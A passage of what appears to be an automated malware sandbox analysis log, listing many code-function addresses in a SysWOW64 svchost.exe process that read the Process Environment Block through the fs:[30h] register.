Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]	2_2_03A663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]	2_2_03AEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h]	2_2_03AB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]	2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]	2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]	2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]	2_2_03A2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]	2_2_03A50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]	2_2_03AD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]	2_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]	2_2_03AD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]	2_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]	2_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]	2_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]	2_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]	2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]	2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]	2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]	2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]	2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]	2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]	2_2_03A2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]	2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]	2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]	2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]	2_2_03A2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]	2_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]	2_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]	2_2_03A2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]	2_2_03A36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]	2_2_03A70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]	2_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]	2_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]	2_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]	2_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]	2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]	2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]	2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]	2_2_03B061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]	2_2_03A601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]	2_2_03A60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]	2_2_03AF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]	2_2_03A2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]	2_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]	2_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]	2_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]	2_2_03AC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]	2_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]	2_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]	2_2_03A3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_03A2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]	2_2_03A380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]	2_2_03AB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]	2_2_03A2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]	2_2_03A720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]	2_2_03AB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]	2_2_03A2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]	2_2_03A2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h]	2_2_03AC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]	2_2_03AB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]	2_2_03A5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]	2_2_03A32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]	2_2_03AB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]	2_2_03A307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h]	2_2_03AD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]	2_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]	2_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]	2_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]	2_2_03ABE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]	2_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]	2_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]	2_2_03AB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]	2_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]	2_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]	2_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]	2_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]	2_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]	2_2_03AAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]	2_2_03A6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]	2_2_03A30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]	2_2_03A60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]	2_2_03A38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]	2_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]	2_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]	2_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]	2_2_03A30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]	2_2_03ABE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]	2_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]	2_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]	2_2_03AB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]	2_2_03A6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]	2_2_03A666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]	2_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]	2_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]	2_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]	2_2_03A4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]	2_2_03A66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]	2_2_03A68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]	2_2_03A3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]	2_2_03AAE609
